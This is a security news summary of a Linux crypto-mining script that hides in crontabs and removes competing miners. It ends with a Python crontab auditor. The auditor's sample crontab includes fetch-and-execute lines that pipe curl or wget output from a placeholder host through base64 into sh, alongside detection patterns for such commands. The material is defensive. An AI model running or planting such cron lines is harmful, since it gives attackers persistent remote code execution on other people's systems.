• A new malicious cryptocurrency-mining script hides in crontabs to plague Linux systems.
• The new script detects and deletes many of the known Linux miners, essentially cleaning the host for itself.
• Its code is based on KORKERDS, but it comes with subtle yet crucial improvements over it.

Trend Micro researchers have discovered a new crypto-mining malware that deletes a large number of known Linux coin miners so that all of the host's resources are available to itself. The script uses code from KORKERDS and Xbash, combining obfuscation and persistence traits. This new malware uses crontab commands to download and execute more malicious code. Cron is a time-based task scheduler for Linux, so the script runs periodically, is not affected by system reboots, and re-downloads the malware code if it has been detected and deleted.

Unlike the KORKERDS code that serves as its basis, the new malware does not uninstall security products found on the infected system, nor does it install a rootkit. Instead, these components are included in its kill list, so if the original KORKERDS is already on the system, it gets stopped. The cryptocurrency miner that the script downloads is a custom version of XMR-Stak, one that supports a wide range of CPUs and GPUs, so the mining results are optimal. The new script not only kills all other coin miners and malware, it also spots connections and services tied to specific IP addresses and suspends these as well.

The script inserts a single crontab to make the fetching and execution of the BASE64-encoded code possible. KORKERDS, by contrast, uses crontab more extensively and openly, so this new script operates with a higher level of concealment, while its propagation is still based on the KORKERDS Python script. Although subtle, the differences between KORKERDS and the new script are key to the efficiency and effectiveness of its operational routine. Removing all competing miners and malware, or at least stopping them, may make this script look like the lesser evil, but that doesn’t mean that the infected system will run any faster under its rule.

The best practice against this type of infection remains a multi-layered system setup, so that when a malicious script finds its way into a farm, it can be isolated and contained to a group of systems at worst. Regularly checking crontab entries and monitoring the tasks that eat up system resources is another solid way to detect possible malware infections. For a full list of the indicators of compromise for this new crypto-mining malware, check the detailed Trend Micro security report.
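
One way to automate the crontab check described above is sketched below. It is an example added here, not code from Trend Micro or from the malware, and it flags cron entries that combine a downloader, a base64 decode and a pipe into an interpreter, including when the command is hidden inside a base64 string. The rule set, the function names and the sample crontab (with the placeholder host `example.invalid`) are assumptions constructed for illustration.

```python
import base64
import re

# Heuristics are assumptions made for this example, not indicators from the report.
RULES = {
    "downloader": re.compile(r"\b(curl|wget)\b"),
    "base64-decode": re.compile(r"base64\s+(-d|--decode)\b|b64decode"),
    "pipe-to-interpreter": re.compile(r"\|\s*((ba)?sh|python[0-9.]*)\b"),
}
BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decoded_blobs(entry):
    """Yield the text hidden in long base64 runs inside a cron entry."""
    for blob in BLOB.findall(entry):
        try:
            padded = blob + "=" * (-len(blob) % 4)
            yield base64.b64decode(padded, validate=True).decode("ascii")
        except ValueError:  # not valid base64, or not text once decoded
            continue


def audit_crontab(text):
    """Return [(line_no, sorted reasons)] for entries that need a manual look."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        reasons = {name for name, rx in RULES.items() if rx.search(entry)}
        for hidden in decoded_blobs(entry):
            reasons |= {"encoded:" + n for n, rx in RULES.items() if rx.search(hidden)}
        if len(reasons) >= 2:  # a lone curl health check is normal; combinations are not
            findings.append((no, sorted(reasons)))
    return findings


# Constructed sample crontab; the host example.invalid is a placeholder.
_ENC = base64.b64encode(b"curl -fsSL http://example.invalid/b | sh").decode()
SAMPLE = "\n".join([
    "# m h dom mon dow command",
    "0 3 * * * /usr/local/bin/backup.sh >/dev/null 2>&1",
    "*/15 * * * * curl -fsS https://example.invalid/health >/dev/null",
    "*/10 * * * * (curl -fsSL http://example.invalid/a||wget -q -O- http://example.invalid/a)|base64 -d|sh",
    "*/30 * * * * echo " + _ENC + "|base64 -d|sh",
])

if __name__ == "__main__":
    for no, reasons in audit_crontab(SAMPLE):
        print(f"line {no}: {', '.join(reasons)}")
```

Feed it the output of `crontab -l` for each user and the contents of the files under `/etc/cron.d`; a hit is a prompt for manual review, not a verdict.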
